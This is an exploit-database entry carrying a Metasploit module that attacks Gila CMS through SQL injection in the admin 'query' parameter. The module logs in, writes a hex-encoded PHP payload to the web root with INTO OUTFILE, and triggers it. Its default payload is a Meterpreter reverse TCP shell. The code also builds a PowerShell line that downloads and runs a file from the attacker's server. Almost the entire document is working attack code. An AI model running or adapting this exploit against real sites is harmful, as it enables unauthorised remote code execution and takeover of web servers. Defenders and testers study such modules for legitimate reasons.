Gila CMS 1.11.8 - 'query' SQL Injection(Metasploit)

2020.06.18
tr th3d1gger (TR) tr
Risk: High
Local: Yes
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require "net/http" require "uri" require 'nokogiri' class MetasploitModule < Msf::Exploit Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Gila CMS 1.1.18.1 Shell Upload ', 'Description' => %q{ This module exploits sql injection vulnerability in "query" parameter that found on Gila CMS 1.1.18.1 . }, 'Author' => [ 'th3d1gger','Carlos Ramirez L. (BillyV4)' ], 'References' => [ ['CVE', 'CVE-2020-5515'], ['PACKETSTORM', '158114'] ], 'License' => 'MSF_LICENSE', 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Type' => :php_memory, 'Payload' => { 'BadChars' => "'" }, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } ], ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [ true, 'Email to login with', 'user@gilacms.com']), OptString.new('PASSWORD', [ true, 'Password to login with', 'password']), OptString.new('TARGETURI', [ true, 'Uri for Gila CMS base', '/gila-1.11.8/']), OptString.new('TARGETPATH', [ true, 'Full Path to shell upload', "C://xampp3//htdocs//gila-1.11.8//"])#, ], self.class) # OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.0.1']), # OptInt.new('SRVPORT', [true, 'HTTP Server Bind Port', '4554']), # OptString.new('FILENAME', [true, 'Payload filename', 'payloader.elf']) end def primer end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end #some serving things # def on_request_uri(cli, req) # @pl = generate_payload_exe # print_status("#{peer} - Payload request received: #{req.uri}") # send_response(cli, @pl) # end def gila uri = URI.parse('http://'+rhost.to_s+':'+rport.to_s+datastore['targeturi'].to_s+'/admin') http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) cookies = response.response['set-cookie'] cookies = cookies.split(';')[0] request = Net::HTTP::Post.new(uri) request.set_form_data({"username" => username, "password" => password}) request['Cookie'] = cookies request['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' response = http.request(request) if response && response.body.include?("Dashboard") print_good("yayayay! Authenticated with #{username}:#{password}") gsessionid = response.response['set-cookie'] @fname = "#{rand_text_alphanumeric(rand(10)+6)}.PHP" #for windows php = "<?php shell_exec('powershell -c \"Invoke-WebRequest -Uri http://"+srvhost+":"+srvport.to_s+"/"+filename+" -OutFile "+ datastore['targetpath']+"assets//"+filename+ " \"'); shell_exec('"+datastore['targetpath']+"assets//"+filename+"') ?>" #bypass strip_tags php = "<?php #{payload.encoded} ?>" php = php.each_byte.map { |b| b.to_s(16) }.join php = "0x"+php uri = URI.parse('http://'+rhost.to_s+':'+rport.to_s+datastore['targeturi'].to_s+'/admin/sql?query=SELECT id FROM user LIMIT 0,1 INTO OUTFILE \''+datastore['targetpath'] +"assets//"+@fname+'\' LINES TERMINATED BY '+php+'') request = Net::HTTP::Get.new(uri) request['Cookie'] = cookies+';'+ gsessionid.split(';')[0]+';' request['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' response = http.request(request) if response.body.include?('Page created in') #Another serving things #resource_uri="/"+filename #start_service({'Uri' => { # 'Proc' => Proc.new { |cli, req| # on_request_uri(cli, req)}, # 'Path' => resource_uri # }}) # print_status("#{rhost}:#{rport} - Trying Exploitation in 2 requests...") print_status("Payload uploaded") print_status("#{@fname}") print_status("#{peer} - Executing #{@fname}...") uri = URI.parse('http://'+rhost.to_s+':'+rport.to_s+datastore['targeturi'].to_s+'assets/'+@fname) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) print_status("Payload is on #{uri} You can trigger it by yourself if it doesn't work.") #and things about server #print_status("#{srvhost}:#{srvport} - Waiting 1 minute for shell") # sleep(60) else print_status("Payload can not be uploaded") print response.body end else # print_status(response.body) fail_with(Failure::NoAccess, 'Credentials are not valid.') end end def exploit gila if gila.nil? fail_with(Failure::Unknown, 'Something went wrong!') end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top